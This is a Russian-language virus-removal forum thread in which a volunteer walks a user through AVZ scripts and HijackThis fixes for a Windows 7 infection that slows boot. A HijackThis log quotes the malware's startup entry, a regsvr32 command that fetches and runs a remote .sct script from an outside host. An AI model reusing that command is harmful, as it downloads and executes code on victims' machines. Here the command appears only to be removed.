Поймал вирус, ПК долго грузится и долго завершает работу

[Vadim2268 0]

Доброго времени суток!

Спустя три недели после обновления ПК и с нуля установленной системы ребенок при просмотре мультиков умудрился наловить вирусов.
 
много букв и картинок:

Начало это проявляться тем, что ПК начал значительно дольше загружаться и завершать работу, если ранее это было несколько секунд, то теперь это стало по несколько минут.
 
Система Виндовс 7 х32, система установленна на отдельный SSD, остальные файлы на HDD.
 
В автозагрузки обнаружил вот такую штуку:



Нехитрый запрос в гугл показал что это вирус. Сняв галочку с автозагрузки, после перезагрузки появилась еще одна уже с галочкой автозагрузки.
 
Пройдя в тему - тыць
 
Провел сканирование ПК - Kaspersky Virus Removal Tool 2015;
 
Первое сканирование нашло 5 объектов среди прочих: муся, муся 2, муся 3... нажал кнопку сохранить продолжилось сканирование и нашло еще 2 объекта, среди прочих какая то Галя... после утилита перезагрузила ПК и снова продолжила сканировать и нашла еще порядка 13 угроз, потом еще... прилагаю несколько фото:






 
После завершения сканирования ПК и вовсе перестал загружаться, так и стоял на картинке Загрузка Виндовс, в безопасном режиме так же не загружался.

Полез внутрь ПК, отключил HDD после ПК быстро загрузился, быстро завершил работу. Это позволило провести сбор логов, файл прилагаю.
 
Прошу помощи.

CollectionLog-2018.12.14-11.32.zip

Изменено 14 декабря, 2018 пользователем regist
спойлер

[regist 617]

@Vadim2268, не понятны две вещи.

1) У вас KVRT не смог вылечить? По прежнему находит эти угрозы?

2) Что вам там отключили? У вас система не загружается после лечения или что?

+

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 ClearQuarantineEx(true);
 QuarantineFile('c:\windows\debug\ok.dat', '');
 DeleteFile('c:\windows\debug\ok.dat', '32');
 DeleteSchedulerTask('ok');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start', 'command', '32');
BC_ImportALL;
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
BC_Activate;
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в АВЗ:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

 - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KLAN)

 

"Пофиксите" в HijackThis:

O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp0930.host:280/v.sct scrobj.dll (HKLM) (2018/12/14)
O7 - IPSec: Name: win (2018/12/13) - {240dcd19-b113-40d9-a304-c811e0747740} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/12/13) - {240dcd19-b113-40d9-a304-c811e0747740} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/12/13) - {240dcd19-b113-40d9-a304-c811e0747740} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/12/13) - {240dcd19-b113-40d9-a304-c811e0747740} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/12/13) - {240dcd19-b113-40d9-a304-c811e0747740} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block

 
Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. В первом диалоговом окне нажмите ОК, удерживая нажатой клавишу Shift.

[Vadim2268 0]

1) KVRT более никаких угроз не находит.
2) я в системном блоке физически отключил HDD, только после этого ПК смог загрузится.

Выполнил Ваши указания.

Файл quarantine.zip из папки AVZ несколько раз отправил по адресу newvirus@kaspersky.com, получал ответы:
 

Ваше письмо не содержит ни одного файла. Возможно, антивирус на почтовом сервере удалил ваш файл как инфицированный.
Если вы нам посылали файл, пожалуйста, отправьте его снова в архиве с паролем "infected" (без кавычек).
Вы также можете загрузить файлы на любой популярный файловый хостинг или FTP-сервер.

загрузил файл на файлообменник и еще раз отправил уже ссылку на файл по адресу newvirus@kaspersky.com, пришел ответ:
 

Thank you for contacting Kaspersky Lab

The specified URLs have been scanned with the Kaspersky Security Network cloud service.

Our antivirus databases do not contain the specified URLs:
http://sat-one.info/filez/20181214185201805.zip

We will thoroughly analyze URLs you sent. If the result of the analysis is different from this automatic scan result, you will be notified via email.

This is an automatically generated message. Please do not reply to it.

Повторите логи, файл прилагаю.

Из проблем осталась одна, когда подключаю HHD диск (в системном блоке), загрузка виндовса стопорится на стадии загрузки, виндовс не загружается.

фото:

 

CollectionLog-2018.12.14-19.06.zip

Изменено 14 декабря, 2018 пользователем Vadim2268

[regist 617]

 

 

когда подключаю HHD диск (в системном блоке), загрузка виндовса стопорится на стадии загрузки, виндовс не загружается.

Это просто дополнительный жёсткий диск для хранения данных? Можете загрузиться с Live CD или подключить его в другое место или любым другим способом проверить на нём данные нормально читаются? Разделы видны?

[Vadim2268 0]

Да, дополнительный жёсткий диск для хранения данных.

 

Подключил к другому ПК, все без проблем загрузилось, данные читаются, проверил так же на другом ПК с помощью Kaspersky Virus Removal Tool 2015, все чисто, ничего не обнаружено. Разделы видны.

Изменено 14 декабря, 2018 пользователем Vadim2268

[regist 617]

@Vadim2268, тут проблема явно не с вирусами. Так что лучше вам создать отдельную тему в разделе Компьютерная помощь и продолжить разбираться с этим там.

А пока ещё попробуйте загрузиться в безопасном режиме и проверить проблему там.

 

+

Выполните скрипт в AVZ при наличии доступа в интернет:

var
LogPath : string;
ScriptPath : string;

begin
 LogPath := GetAVZDirectory + 'log\avz_log.txt';
 if FileExists(LogPath) Then DeleteFile(LogPath);
 ScriptPath := GetAVZDirectory +'ScanVuln.txt';

  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
       ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
       exit;
      end;
  end;
 if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.

После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к Java Runtime Environment, Adobe Reader и Adobe Flash Player, это программы, уязвимостями в которых наиболее часто пользуются для внедрения зловредов в систему.

Выполните рекомендации после лечения.
 

[Vadim2268 0]

В общем, на жёстком диске было три локальных диска, на одном из локальных дисков было несколько папок с непонятным названием состоящем из многа букав и цифр, при попытке открыть эти папки выдавало сообщение мол нет прав и бла бла бла.

 

Удалил эти папки, потом провел проверку средствами вин 10 на наличие ошибок, потом провел оптимизацию и дефрагментацию, все прошло быстро и успешно.

 

Установил жесткий диск обратно в проблемный ПК, во время появления экрана старта виндовс появилось черное окно проверки жесткого диска и файловой системы NTFS, довольно быстро прошла вся проверка и исправления и ПК (о чудо) наконец успешно загрузился.

 

Проблема решена.

 

Большое спасибо regist